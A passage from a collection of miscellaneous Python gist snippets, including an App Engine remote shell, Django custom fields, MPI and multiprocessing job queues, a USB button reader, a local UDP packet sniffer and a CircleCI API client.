## including the SDK, it's libraries, your APPDIR, and APPDIR/lib
EXTRA_PATHS = [
SDK_DIR,
os.path.join(SDK_DIR, 'lib', 'antlr3'),
os.path.join(SDK_DIR, 'lib', 'django'),
os.path.join(SDK_DIR, 'lib', 'webob'),
os.path.join(SDK_DIR, 'lib', 'yaml', 'lib'),
APP_DIR,
os.path.join(APP_DIR, 'lib'),
]
sys.path = EXTRA_PATHS + sys.path
from google.appengine.ext.remote_api import remote_api_stub
def attach(host=None):
def auth_func():
if host and host.startswith('localhost'):
return ('foo', 'bar')
else:
return (EMAIL, getpass.getpass())
remote_api_stub.ConfigureRemoteApi(APPID, REMOTE_API_PATH, auth_func, host)
remote_api_stub.MaybeInvokeAuthentication()
os.environ['SERVER_SOFTWARE'] = 'Development (remote_api)/1.0'
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == '-l':
host = 'localhost:8080'
else:
host = None
attach(host)
from google.appengine.ext import db
from google.appengine.api import memcache
BANNER = "App Engine remote_api shell\n" + \
"Python %s\n" % sys.version + \
"The db, and memcache modules are imported."
## Use readline for completion/history if available
try:
import readline
except ImportError:
pass
else:
HISTORY_PATH = os.path.expanduser('~/.remote_api_shell_history')
readline.parse_and_bind('tab: complete')
if os.path.exists(HISTORY_PATH):
readline.read_history_file(HISTORY_PATH)
import atexit
atexit.register(lambda: readline.write_history_file(HISTORY_PATH))
sys.ps1 = '%s <-- ' % (host or APPID)
import code
code.interact(banner=BANNER, local=globals())
```
#### File: hard-gists/263113/snippet.py
```python
import django
from django.utils.translation import ugettext_lazy as _
from debug_toolbar.panels import DebugPanel
from haystack.backends import queries
class HaystackDebugPanel(DebugPanel):
"""
Panel that displays the Haystack queries.
"""
name = 'Haystack'
has_content = True
def nav_title(self):
return _('Haystack queries')
def nav_subtitle(self):
return "%s queries" % len(queries)
def url(self):
return ''
def title(self):
return 'Haystack Queries'
def content(self):
return "".join(["<p>%s<br><br></p>" % q for q in queries])
```
#### File: hard-gists/2691939/snippet.py
```python
import sys
import time
import sched
import snmpclient
import pysnmp.entity.rfc3413.oneliner.cmdgen as cmdgen
client = snmpclient.SnmpClient('192.168.1.10', [{}])
generator = cmdgen.CommandGenerator()
target = cmdgen.UdpTransportTarget((client.host, client.port))
oids = ['IF-MIB::ifHCInOctets.10001', 'IF-MIB::ifHCOutOctets.10002', 'IF-MIB::ifHCOutOctets.10003']
noids = map(snmpclient.nodeid, oids)
s = sched.scheduler(time.time, time.sleep)
with file(sys.argv[1], 'a') as f:
f.write('# start\n')
def poll(sc):
s.enter(1, 1, poll, (s,))
val = [time.time()]
for noid in noids:
error, _, _, binds = generator.getCmd(client.auth, target, noid)
if error:
raise Exception('FAIL')
val.append(int(binds[0][1]))
val = ','.join(map(str, val))
f.write(val)
f.write('\n')
f.flush()
print val
s.enter(1, 1, poll, (s,))
s.run()
```
#### File: hard-gists/2768310/snippet.py
```python
from django.db import models
from djangotoolbox.fields import BlobField
class ProtobufField(BlobField):
description = "Storage for protobuffer objects"
__metaclass__ = models.SubfieldBase
def __init__(self, protoclass, *args, **kwargs):
self.protoclass = protoclass
super(ProtobufField, self).__init__(*args, **kwargs)
def to_python(self, value):
if isinstance(value, self.protoclass):
return value
protobuf = self.protoclass()
protobuf.ParseFromString(value)
return protobuf
def get_prep_value(self, value):
return value.SerializeToString()
def get_db_prep_value(self, value, connection, prepared=False):
if hasattr(value, "SerializeToString"):
value = value.SerializeToString()
return super(ProtobufField, self).get_db_prep_value(value=value, connection=connection, prepared=prepared)
def value_to_string(self, obj):
obj = obj.SerializeToString()
return super(ProtobufField, self).value_to_string(obj)
```
#### File: hard-gists/2773137/snippet.py
```python
import ROOT
from mpi4py import MPI
import sys
import cPickle as pick
WORKTAG = 0
DIETAG = 1
class Work():
def __init__(self, work_items):
self.work_items = work_items[:]
def get_next_item(self):
if len(self.work_items) == 0:
return None
return self.work_items.pop()
def master(wi):
all_data = []
size = MPI.COMM_WORLD.Get_size()
current_work = Work(wi)
comm = MPI.COMM_WORLD
status = MPI.Status()
for i in range(1, size):
anext = current_work.get_next_item()
if not anext: break
comm.send(obj=anext, dest=i, tag=WORKTAG)
while 1:
anext = current_work.get_next_item()
if not anext: break
data = comm.recv(obj=None, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)
all_data.append(data)
comm.send(obj=anext, dest=status.Get_source(), tag=WORKTAG)
for i in range(1,size):
data = comm.recv(obj=None, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG)
all_data.append(data)
for i in range(1,size):
comm.send(obj=None, dest=i, tag=DIETAG)
return all_data
def slave(do_work):
comm = MPI.COMM_WORLD
status = MPI.Status()
while 1:
data = comm.recv(obj=None, source=0, tag=MPI.ANY_TAG, status=status)
if status.Get_tag(): break
comm.send(obj=do_work(data), dest=0)
def main(work_list, do_work):
rank = MPI.COMM_WORLD.Get_rank()
name = MPI.Get_processor_name()
size = MPI.COMM_WORLD.Get_size()
if rank == 0:
all_dat = master(work_list)
else:
slave(do_work)
```
#### File: hard-gists/2778605/snippet.py
```python
import sys
import time
import usb
class Button:
def __init__(self, vendor_id, device_id):
"""
Find and open a USB HID device.
"""
self.vendor_id = vendor_id
self.device_id = device_id
self.endpoint = 0x81
self.device = self.getDevice(vendor_id, device_id)
if self.device == None:
raise DeviceNotFound, "No recognised device connected."
self.handle = self.openDevice(self.device)
def __del__(self):
"""
Releases the device.
"""
try:
self.handle.releaseInterface()
del self.handle
except:
pass
def getDevice(self, vendor_id, device_id):
"""
Searches the USB buses for a device matching the given vendor and device IDs.
Returns a usb.Device, or None if the device cannot be found.
"""
busses = usb.busses()
for bus in busses:
devices = bus.devices
for device in devices:
if device.idVendor == vendor_id and device.idProduct == device_id:
return device
return None
def openDevice(self, device):
"""
Opens and claims the specified device. Returns a usb.DeviceHandle
Also attempts to detach the kernel's driver from the device, if necessary.
"""
handle = device.open()
# Attempt to remove other drivers using this device. This is necessary
# for HID devices.
try:
handle.detachKernelDriver(0)
except:
pass # Ignore failures here, the device might already be detached.
handle.claimInterface(0)
return handle
def on_keydown(self):
print "keydown event"
def on_keyup(self):
print "keyup event"
def start(self):
data = None
while True:
try:
data = self.handle.interruptRead(self.endpoint, 8, 0)
except:
raise
if data == (0, 0, 88, 0, 0, 0, 0, 0): # numeric keypad enter pressed
self.on_keydown()
elif data == (0, 0, 0, 0, 0, 0, 0, 0):
self.on_keyup()
data = None
class DeviceNotFound(Exception):
def __init__(self,value):
self.value = value
def __str__(self):
return repr(self.value)
if __name__ == "__main__":
button = Button(0x1710, 0x5612)
button.start()
```
#### File: hard-gists/2798682/snippet.py
```python
import multiprocessing
from multiprocessing.managers import SyncManager
import Queue
import time
from factorize import factorize_naive
from eblib.utils import Timer
IP = '192.168.1.102'
PORTNUM = 55444
AUTHKEY = 'shufflin'
def make_server_manager(port, authkey):
job_q = Queue.Queue()
result_q = Queue.Queue()
class JobQueueManager(SyncManager):
pass
JobQueueManager.register('get_job_q', callable=lambda: job_q)
JobQueueManager.register('get_result_q', callable=lambda: result_q)
manager = JobQueueManager(address=('', port), authkey=authkey)
manager.start()
print 'Server started at port %s' % port
return manager
def make_client_manager(ip, port, authkey):
class ServerQueueManager(SyncManager):
pass
ServerQueueManager.register('get_job_q')
ServerQueueManager.register('get_result_q')
manager = ServerQueueManager(address=(ip, port), authkey=authkey)
manager.connect()
print 'Client connected to %s:%s' % (ip, port)
return manager
def factorizer_worker(job_q, result_q):
myname = multiprocessing.current_process().name
while True:
try:
job = job_q.get_nowait()
#print '%s got %s nums...' % (myname, len(job))
outdict = {n: factorize_naive(n) for n in job}
result_q.put(outdict)
#print ' %s done' % myname
except Queue.Empty:
return
def mp_factorizer(shared_job_q, shared_result_q, nprocs):
procs = []
for i in range(nprocs):
p = multiprocessing.Process(
target=factorizer_worker,
args=(shared_job_q, shared_result_q))
procs.append(p)
p.start()
for p in procs:
p.join()
def make_nums(N):
nums = [999999999999]
for i in xrange(N):
nums.append(nums[-1] + 2)
return nums
def runserver():
manager = make_server_manager(PORTNUM, AUTHKEY)
shared_job_q = manager.get_job_q()
shared_result_q = manager.get_result_q()
N = 999
nums = make_nums(N)
chunksize = 43
for i in range(0, len(nums), chunksize):
#print 'putting chunk %s:%s in job Q' % (i, i + chunksize)
shared_job_q.put(nums[i:i + chunksize])
with Timer('howlong...'):
mp_factorizer(shared_job_q, shared_result_q, 8)
numresults = 0
resultdict = {}
while numresults < N:
outdict = shared_result_q.get()
resultdict.update(outdict)
numresults += len(outdict)
for num, factors in resultdict.iteritems():
product = reduce(lambda a, b: a * b, factors, 1)
if num != product:
assert False, "Verification failed for number %s" % num
print '--- DONE ---'
time.sleep(2)
manager.shutdown()
def runclient():
manager = make_client_manager(IP, PORTNUM, AUTHKEY)
job_q = manager.get_job_q()
result_q = manager.get_result_q()
mp_factorizer(job_q, result_q, 4)
if __name__ == '__main__':
import sys
if len(sys.argv) > 1 and sys.argv[1] == 'client':
runclient()
else:
runserver()
```
#### File: hard-gists/2830057/snippet.py
```python
import urlparse
import re
from django.db import models
from django import forms
def validate_youtube_url(value):
'''El patron lo saque de http://stackoverflow.com/questions/2964678/jquery-youtube-url-validation-with-regex'''
pattern = r'^http:\/\/(?:www\.)?youtube.com\/watch\?(?=.*v=\w+)(?:\S+)?$'
if value[:16] == 'http://youtu.be/':
if re.match(r'\w+', value[16:]) is None:
raise forms.ValidationError(_('Not a valid Youtube URL'))
elif re.match(pattern, value) is None:
raise forms.ValidationError(_('Not a valid Youtube URL'))
class YoutubeUrl(unicode):
@property
def video_id(self):
parsed_url = urlparse.urlparse(self)
if parsed_url.query == '':
return parsed_url.path
return urlparse.parse_qs(parsed_url.query)['v'][0]
@property
def embed_url(self):
return 'http://youtube.com/embed/%s/' % self.video_id
@property
def thumb(self):
return "http://img.youtube.com/vi/%s/2.jpg" % self.video_id
class YoutubeUrlField(models.URLField):
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
super(YoutubeUrlField, self).__init__(*args, **kwargs)
self.validators.append(validate_youtube_url)
def to_python(self, value):
url = super(YoutubeUrlField, self).to_python(value)
return YoutubeUrl(url)
def get_prep_value(self, value):
return unicode(value)
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules([], ["^fields\.YoutubeUrlField"])
except ImportError:
pass
```
#### File: hard-gists/2838927/snippet.py
```python
import tw2.core as twc
import tw2.forms as twf
import tw2.sqla as twsa
import tw2.bootstrap as twb
from awesome.model import Group, User
class DbSelectionField(twf.SelectionField):
entity = twc.Param('SQLAlchemy mapped class to use', request_local=False)
query = twc.Param()
def prepare(self):
self.options = [(x.id, unicode(x)) for x in self.query.all()]
super(DbSelectionField, self).prepare()
class GroupSelectField(twb.SingleSelectField, DbSelectionField):
@classmethod
def post_define(cls):
if getattr(cls, 'entity', None):
cls.validator = twsa.RelatedValidator(entity=cls.entity)
class UserForm(twb.HorizontalForm):
id = twf.HiddenField()
group_id = GroupSelectField(
entity=Group,
)
def prepare(self):
self.child.c.group_id.query = \
Group.query.filter(
Group.id.in_(User.query.get(self.value.id).groups)
)
super(UserForm, self).prepare()
```
#### File: hard-gists/2866253/snippet.py
```python
from random import choice
from string import ascii_lowercase, digits
from django.contrib.auth.models import User
def generate_random_username(length=16, chars=ascii_lowercase+digits, split=4, delimiter='-'):
username = ''.join([choice(chars) for i in xrange(length)])
if split:
username = delimiter.join([username[start:start+split] for start in range(0, len(username), split)])
try:
User.objects.get(username=username)
return generate_random_username(length=length, chars=chars, split=split, delimiter=delimiter)
except User.DoesNotExist:
return username;
```
#### File: hard-gists/2870240/snippet.py
```python
import subprocess
# PyObjC-related imports
from AppKit import NSApplication, NSSystemDefined
from PyObjCTools import AppHelper
KEY_UP = 11
class KeySocketApp(NSApplication):
repeated = False
def sendEvent_(self, event):
if event.type() is NSSystemDefined and event.subtype() is 8:
data = event.data1()
keyCode = (data & 0xFFFF0000) >> 16
keyFlags = (data & 0x0000FFFF)
keyState = (keyFlags & 0xFF00) >> 8
keyRepeat = keyFlags & 0x1
if keyRepeat and keyState is not KEY_UP:
if keyCode == 20:
self.repeated = True
print "prev"
subprocess.call(['cmus-remote', '-k', '-10'])
elif keyCode == 19:
self.repeated = True
print "forward"
subprocess.call(['cmus-remote', '-k', '+10'])
if keyState is KEY_UP:
if self.repeated:
self.repeated = False
elif keyCode == 20:
print "PREV"
subprocess.call(['cmus-remote', '-r'])
elif keyCode == 16:
print "PLAY"
subprocess.call(['cmus-remote', '-u'])
elif keyCode == 19:
print "FORWARD"
subprocess.call(['cmus-remote', '-n'])
if __name__ == '__main__':
app = KeySocketApp.sharedApplication()
AppHelper.runEventLoop()
```
#### File: hard-gists/2872d7f994d192188970408980267e6e/snippet.py
```python
from bs4 import BeautifulSoup,SoupStrainer
import urllib.request
import colorama,re,queue,threading
from colorama import Fore
from urllib.parse import *
class check_link():
def __init__(self,address):
self.address=address
def check(self,address):
try:
req=urllib.request.Request(url=address)
resp=urllib.request.urlopen(req)
if resp.status in [400,404,403,408,409,501,502,503]:print (Fore.RED+resp.status+"-"+resp.reason+"-->"+address)
else: print (Fore.GREEN+"no problem in-->"+address)
except Exception as e:
print (Fore.YELLOW+"{}-{}".format(e,address))
pass
def pattern_adjust(a):
try:
if re.match('^#' ,a):return 0
r=urlsplit(a)
if r.scheme=='' and (r.netloc!='' or r.path!=''):
d=urlunsplit(r)
if re.match('^//' ,d):
m= re.search('(?<=//)\S+', d)
d=m.group(0)
m="https://"+d
return m
elif r.scheme=='' and r.netloc=='':
return address+a
else:return a
except Exception as e:
pass
def extract_link(address):
tags= {'a':'href', 'img':'src', 'script':'src', 'link':'href' }
for key,value in iter(tags.items()):
try:
res=urllib.request.urlopen(address)
response=res.read().decode('utf-8') #needs improvement
for link in BeautifulSoup(response,"html.parser",parse_only=SoupStrainer(key)):
if link.has_attr(value):
p=pattern_adjust(link[value])
if p!=0 and str(p)!='None':
newcheck=check_link(p)
newcheck.check(p)
if p not in hyperlinks:
hyperlinks.add(p)
if website.split('.')[1] in p:#needs improvement
if not website.endswith(('.png','.jpeg','.js','jpg')):
q.put(p)
except Exception as e:
print (e,address)
def threader():
while True:
value=q.get()
result=extract_link(value)
q.task_done()
if __name__=="__main__":
colorama.init()
q=queue.Queue()
global hyperlinks,website
hyperlinks=set()
website=input("Please enter the website address: ")
for x in range(30):
t=threading.Thread(target=threader)
t.deamon=True
t.start()
q.put(website.strip())
q.join()
```
#### File: hard-gists/2888380/snippet.py
```python
import bottle
from wsgiproxy.app import WSGIProxyApp
# Remove "hop-by-hop" headers (as defined by RFC2613, Section 13)
# since they are not allowed by the WSGI standard.
FILTER_HEADERS = [
'Connection',
'Keep-Alive',
'Proxy-Authenticate',
'Proxy-Authorization',
'TE',
'Trailers',
'Transfer-Encoding',
'Upgrade',
]
root = bottle.Bottle()
proxy_app = WSGIProxyApp("http://localhost/")
def wrap_start_response(start_response):
def wrapped_start_response(status, headers_out):
# Remove "hop-by-hop" headers
headers_out = [(k,v) for (k,v) in headers_out
if k not in FILTER_HEADERS]
return start_response(status, headers_out)
return wrapped_start_response
def wrapped_proxy_app(environ, start_response):
start_response = wrap_start_response(start_response)
return proxy_app(environ, start_response)
root.mount(wrapped_proxy_app,"/proxytest")
@root.route('/hello/:name')
def index(name='World'):
return '<b>Hello %s!</b>' % name
bottle.debug(True)
bottle.run(app=root, host='localhost', port=8080)
```
#### File: hard-gists/2975718/snippet.py
```python
from __future__ import absolute_import
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def run_from_argv(self, argv):
self._argv = argv
self.execute()
def handle(self, *args, **options):
from scrapy.cmdline import execute
execute(self._argv[1:])
```
#### File: hard-gists/2986210/snippet.py
```python
import gtk, sys
def tohex(c):
#Convert to hex string
#little hack to fix bug
s = ['#',hex(int(c[0]*256))[2:].zfill(2),hex(int(c[1]*256))[2:].zfill(2),hex(int(c[2]*256))[2:].zfill(2)]
for item in enumerate(s):
if item[1]=='100':
s[item[0]]='ff'
print s
return ''.join(s)
csd = gtk.ColorSelectionDialog('Gnome Color Chooser')
cs = csd.colorsel
cs.set_has_opacity_control(True)
cs.set_current_alpha(65536)
if csd.run()!=gtk.RESPONSE_OK:
print 'No color selected.'
sys.exit()
c = cs.get_current_color()
print "Color Values:"
print 'red:',c.red
print 'green:',c.green
print 'blue:',c.blue
print 'alpha:',cs.get_current_alpha()
print "Hex Codes:"
print tohex((c.red/65536.0, c.green/65536.0, c.blue/65536.0))
```
#### File: hard-gists/2996448/snippet.py
```python
import sublime
import sublime_plugin
class SublimeBlockCursor(sublime_plugin.EventListener):
def view_is_widget(view):
settings = view.settings()
return bool(settings.get('is_widget'))
def show_block_cursor(self, view):
validRegions = []
for s in view.sel():
if s.a != s.b:
continue
validRegions.append(sublime.Region(s.a, s.a + 1))
if validRegions.__len__:
view.add_regions('SublimeBlockCursorListener', validRegions, 'block_cursor')
else:
view.erase_regions('SublimeBlockCursorListener')
def on_selection_modified(self, view):
if view.settings().get('is_widget'):
view.erase_regions('SublimeBlockCursorListener')
return
self.show_block_cursor(view)
def on_deactivated(self, view):
view.erase_regions('SublimeBlockCursorListener')
def on_activated(self, view):
self.show_block_cursor(view)
```
#### File: hard-gists/29c51b6997c3e3bff568/snippet.py
```python
from numpy import linspace
from scipy.integrate import odeint
#import pylab as pyl
import matplotlib.pyplot as plt
# define constants
init_cond = [0.3, -0.1]
t_init = 0.0
t_final = 10.0
time_step = 0.005
num_data =int((t_final-t_init)/time_step)
k_spring = 0.1
c_damper = 0.5
# define ordinary differential equation
def mass_spring_damper(state, t):
x, x_dot = state
f = [x_dot,
-k_spring*x - c_damper*x_dot]
return f
# integrate
t_all = linspace(t_init, t_final, num_data)
y_all = odeint(mass_spring_damper, init_cond, t_all)
# plots
fig = plt.figure()
plt.plot(t_all,y_all[:,0],'b-')
plt.plot(t_all,y_all[:,1],'r--')
plt.legend(['x [m]','dx/dt [m/s]'])
plt.xlabel('time [s]')
plt.ylabel('state')
```
#### File: hard-gists/2a5d283b0d279ea96c26/snippet.py
```python
from concurrent.futures import as_completed, ThreadPoolExecutor
from urllib.request import urlopen
import re
import sys
DEFAULT_REGEX = r'<input type="text" id="nacional" value="([^"]+)"/>'
CURRENCY = {
'dolar': 'http://dolarhoje.com/',
'euro': 'http://eurohoje.com/',
'libra': 'http://librahoje.com/',
'peso': 'http://pesohoje.com/'
}
def exchange_rate(url):
response = urlopen(url).read().decode('utf-8')
result = re.search(DEFAULT_REGEX, response)
if result:
return result.group(1)
def run_threads():
with ThreadPoolExecutor(max_workers=len(CURRENCY)) as executor:
waits = {
executor.submit(exchange_rate, url): currency
for currency, url in CURRENCY.items()
}
for future in as_completed(waits):
currency = waits[future]
print('{}: R${}'.format(currency, future.result()))
def run_serial():
for currency, url in CURRENCY.items():
print('{}: R${}'.format(currency, exchange_rate(url)))
if __name__ == '__main__':
"""
To run serial
$ python multi_requests.py
To run multithread
$ python multi_requests.py threads
"""
if len(sys.argv) > 1 and sys.argv[1] == 'threads':
run_threads()
else:
run_serial()
```
#### File: hard-gists/2aa430e00dde0cf905a9/snippet.py
```python
import re
import anyconfig
from maya.api import OpenMaya as OpenMaya2
##############################################################################
PARENT_CONS_TYPE_ID = OpenMaya2.MTypeId(0x44504152)
##############################################################################
def get_node(x):
try:
y = OpenMaya2.MGlobal.getSelectionListByName("{}*".format(x))
except RuntimeError:
return ''
try:
return y.getDagPath(0)
except:
return y.getDependNode(0)
def get_rotation(dag_path, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.rotation(space, True) # as quat
def set_rotation(dag_path, v, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.setrotation(v, space)
def get_translation(dag_path, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.translation(space)
def set_translation(dag_path, v, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.setTranslation(v, space)
def match(def_file_name="test.yaml", domain="match_guide_on_bone"):
map = anyconfig.load(def_file_name)
for m in map[domain]:
do_match(m)
def do_match(entry):
d = get_node(entry['dst'])
s = get_node(entry['src'])
if not d or not s:
print('nothing todo with {}'.format(entry))
return
v_s = get_translation(s)
set_translation(d, v_s)
def connect_on_deformer(def_file_name="test.yaml", domain="bone_on_deformer"):
map = anyconfig.load(def_file_name)
for m in map[domain]:
do_connect(m)
plug_exp = re.compile(
"(?P<parent_name>\w+)\[(?P<parent_idx>\d+)\]\.(?P<target_name>\w+)")
def _get_plug(node, name):
if '.' in name:
m = plug_exp.match(name)
container_plug = node.findPlug(m.group('parent_name'), False)
if container_plug.isArray:
# mind glitch, setting connection index
# with "selectAncestorLogicalIndex"
kid_attr = container_plug.attribute()
kid_plug = node.findPlug(m.group('target_name'), False)
kid_plug.selectAncestorLogicalIndex(
int(m.group('parent_idx')), kid_attr)
else:
kid_plug = node.findPlug(name, False)
return kid_plug
def do_connect(entry):
d = get_node(entry['dst'])
s = get_node(entry['src'])
if not d or not s:
print('nothing todo with {}'.format(entry))
return
cons_name = "{}_parentConstraint".format(d)
cons_node = OpenMaya2.MFnDependencyNode()
cons_node.create(PARENT_CONS_TYPE_ID, cons_name)
x = get_node(cons_name).node()
dag_mod = OpenMaya2.MDagModifier()
dag_mod.reparentNode(x, d.node())
dag_mod.doIt()
src_node = OpenMaya2.MFnDependencyNode().setObject(s.node())
dst_node = OpenMaya2.MFnDependencyNode().setObject(d.node())
d2c = [
["jointOrient", "constraintJointOrient"],
["rotatePivot", "constraintRotatePivot"],
["parentInverseMatrix[0].parentInverseMatrix",
"constraintParentInverseMatrix"],
["rotateOrder", "constraintRotateOrder"],
["rotatePivotTranslate", "constraintRotateTranslate"]
]
s2c = [
["translate", "target[0].targetTranslate"],
["rotate", "target[0].targetRotate"],
["scale", "target[0].targetScale"],
["parentMatrix[0].parentMatrix", "target[0].targetParentMatrix"],
# ["instObjGroups[0]", ""],
["rotatePivot", "target[0].targetRotatePivot"],
["rotatePivotTranslate", "target[0].targetRotateTranslate"],
["rotateOrder", "target[0].targetRotateOrder"],
["jointOrient", "target[0].targetJointOrient"],
["segmentScaleCompensate", "target[0].targetScaleCompensate"],
["inverseScale", "target[0].targetInverseScale"]
]
c2d = [
# "inverseScale",
# "drawOverride",
# "scale",
# "worldMatrix[0]",
# "lockInfluenceWeights",
# "objectColorRGB",
# "message",
# "bindPose",
["constraintTranslateX", "translateX"],
["constraintTranslateY", "translateY"],
["constraintTranslateZ", "translateZ"],
["constraintRotateX", "rotateX"],
["constraintRotateY", "rotateY"],
["constraintRotateZ", "rotateZ"]
# ["rotateOrder]"
# "parentInverseMatrix[0]",
# "rotatePivot",
# "rotatePivotTranslate",
# "jointOrient"
]
def _conn(map_array, src, dst):
for a in map_array:
# print a[0], a[1]
src_plug = _get_plug(src, a[0])
dst_plug = _get_plug(dst, a[1])
dg_mod.connect(src_plug, dst_plug)
def offset(node, pos, rot):
offset_plug_p_x = _get_plug(node, "target[0].targetOffsetTranslateX")
offset_plug_p_y = _get_plug(node, "target[0].targetOffsetTranslateY")
offset_plug_p_z = _get_plug(node, "target[0].targetOffsetTranslateZ")
offset_plug_r_x = _get_plug(node, "target[0].targetOffsetRotateX")
offset_plug_r_y = _get_plug(node, "target[0].targetOffsetRotateY")
offset_plug_r_z = _get_plug(node, "target[0].targetOffsetRotateZ")
offset_plug_p_x.setDouble(pos[0])
offset_plug_p_y.setDouble(pos[1])
offset_plug_p_z.setDouble(pos[2])
if (not rot[0]):
rot[0] = 0
if (not rot[1]):
rot[1] = 0
if (not rot[2]):
rot[2] = 0
offset_plug_r_x.setDouble(rot[0])
offset_plug_r_y.setDouble(rot[1])
offset_plug_r_z.setDouble(rot[2])
print rot
# dg_mod, must call doIt() later.
dg_mod = OpenMaya2.MDGModifier()
# dst to cns, for some settings
_conn(d2c, dst_node, cons_node)
# src to cos
_conn(s2c, src_node, cons_node)
# cons to dst
_conn(c2d, cons_node, dst_node)
print d
####################################################################
# store transforms for offset
posspace = OpenMaya2.MSpace.kTransform
rotspace = OpenMaya2.MSpace.kTransform
original_pos = get_translation(d, posspace)
original_rot = get_rotation(d, rotspace)
joint_orient_x = _get_plug(dst_node, "jointOrientX").asFloat()
joint_orient_y = _get_plug(dst_node, "jointOrientY").asFloat()
joint_orient_z = _get_plug(dst_node, "jointOrientZ").asFloat()
joint_orient_eul = OpenMaya2.MEulerRotation(
joint_orient_x, joint_orient_y, joint_orient_z)
joint_orient = OpenMaya2.MQuaternion().setValue(joint_orient_eul)
dg_mod.doIt()
# maintain offset
_pos = get_translation(d, posspace)
_rot = get_rotation(d, rotspace)
diff_pos = original_pos - _pos
diff_rot = original_rot * _rot.invertIt()
diff_pos = diff_pos.rotateBy(joint_orient.invertIt()).rotateBy(diff_rot)
offset(cons_node, diff_pos, diff_rot.asEulerRotation())
```
#### File: hard-gists/2da57d5b039aab4da7ce/snippet.py
```python
from pcapy import open_live
from bencode import bdecode
from socket import inet_aton, inet_ntoa
import dpkt
import sys
# Defaults to 51413 (transmission's default port)
filter_port = 51413
# Callback function for parsing packets
def parse_udp(hdr, data):
global filter_port
try:
eth = dpkt.ethernet.Ethernet(data)
except Exception:
return
if eth.type != dpkt.ethernet.ETH_TYPE_IP:
return
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_UDP and filter_port in (ip.data.dport, ip.data.sport):
payload = ip.data.data
else:
return
# Print plain text bencoded request.
try:
data = bdecode(payload)
print "%s:%d -> %s:%d (%d bytes): %s\n" % (inet_ntoa(ip.src), ip.data.sport,
inet_ntoa(ip.dst), ip.data.dport, len(payload), data)
except Exception:
return
def main(argv):
global filter_port
if len(argv) == 1:
try:
filter_port = int(argv[0])
except ValueError:
print "Invalid port number"
sys.exit(1)
print "[+] Starting sniffer"
pcap_obj = open_live("eth0", 65536, False, True)
try:
pcap_obj.loop(-1, parse_udp)
except KeyboardInterrupt:
print "[!] Exiting"
sys.exit(0)
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: hard-gists/2fe1c16a7cc27ef01c1f/snippet.py
```python
import os
import pprint
import subprocess
import sys
from optparse import make_option
from urllib import quote_plus
from urlparse import urljoin
import dateutil.parser
import requests
from django.conf import settings
from django.core.management import BaseCommand, CommandError
from six import python_2_unicode_compatible
ORGANIZATION_NAME = 'org'
PROJECT_NAME = 'project'
class Command(BaseCommand):
help = 'CircleCI Command Line Interface'
option_list = BaseCommand.option_list + (
make_option('--ssh', action='store_true', default=False),
make_option('--cancel', action='store_true', default=False),
make_option('--artifacts', action='store_true', default=False),
make_option('--me', action='store_true', default=False),
make_option('--cancel-redundant-builds', action='store_true'),
make_option('--start'),
)
def __init__(self):
super(Command, self).__init__()
token = getattr(settings, 'CIRCLECI_TOKEN', None) or os.environ.get('CIRCLECI_TOKEN')
if not token:
raise CommandError('You need to specify a circleci access token either in your settings or '
'in your environment')
self.cci = CircleCi(token)
def handle(self, build_id=None, *args, **options):
# Some commands don't require a build
if options['me']:
pprint.pprint(self.cci.me)
return 0
elif options['cancel_redundant_builds']:
self.cancel_redundant_builds()
return 0
elif options['start']:
self.start_build(options['start'])
return 0
# From here on, we need a build number to operate
if not build_id:
error('Please specify a build number.')
build = self.cci.build(build_id)
if options['ssh']:
build_dict = build.data
if not build_dict['ssh_enabled']:
error('This build does not have SSH enabled.')
node = build_dict['node'][0]
ip_addr = node['public_ip_addr']
port = node['port']
cmd = ['ssh', 'ubuntu@{}'.format(ip_addr),
'-p', str(port),
'-o', 'UserKnownHostsFile /dev/null',
'-o', 'StrictHostKeyChecking=no']
print('Running: {}'.format(cmd))
p = subprocess.Popen(cmd, stdout=sys.stdout, stdin=sys.stdin, stderr=sys.stderr)
p.communicate()
elif options['cancel']:
build.cancel()
elif options['artifacts']:
artifacts = build.artifacts
for a in artifacts:
print(a)
print('{} artifact(s).'.format(len(artifacts)))
else:
pprint.pprint(self.cci.build(build_id))
def cancel_redundant_builds(self):
active_builds = {}
for build in self.cci.builds:
if not build.active:
continue
if 'branch' not in build.data:
print('Got weird build #{} without a branch...?'.format(build.build_num))
continue
if not build.queued_at:
print('Looks like build #{} was not queued...?'.format(build.build_num))
pprint.pprint(build)
continue
branch = build.data['branch']
active_builds.setdefault(branch, []).append((build.queued_at, build))
for branch, builds in active_builds.iteritems():
if len(builds) > 1:
builds = sorted(builds)
for queued_at, build in builds[:-1]:
build.cancel()
def start_build(self, branch):
self.cci.post_project('tree/{}'.format(quote_plus(branch)))
class CircleCi(object):
BASE_URL = 'https://circleci.com/api/v1/'
def __init__(self, access_token):
self.token = access_token
@property
def project_base_path(self):
return 'project/{}/{}/'.format(ORGANIZATION_NAME, PROJECT_NAME)
def request(self, method, path, **kwargs):
kwargs.setdefault('params', {}).update(**{'circle-token': self.token})
kwargs.setdefault('headers', {}).update(**{'Accept': 'application/json'})
url = urljoin(self.BASE_URL, path)
print('\x1b[1m{} {}\x1b[0m'.format(method, url))
r = requests.request(method, url, **kwargs)
r.raise_for_status()
return r
def get(self, *args, **kwargs):
r = self.request('GET', *args, **kwargs)
return r.json()
def get_project(self, path='', *args, **kwargs):
path = urljoin(self.project_base_path, path)
return self.get(path, *args, **kwargs)
def post(self, *args, **kwargs):
return self.request('POST', *args, **kwargs)
def post_project(self, path, *args, **kwargs):
path = urljoin(self.project_base_path, path)
return self.post(path, *args, **kwargs)
@property
def builds(self):
builds_data = self.get_project()
return [CircleCiBuild(self, data=build) for build in builds_data]
@property
def me(self):
return self.get('me')
def build(self, build_num):
return CircleCiBuild(self, build_num)
@python_2_unicode_compatible
class CircleCiBuild(object):
def __init__(self, api, build_num=None, data=None):
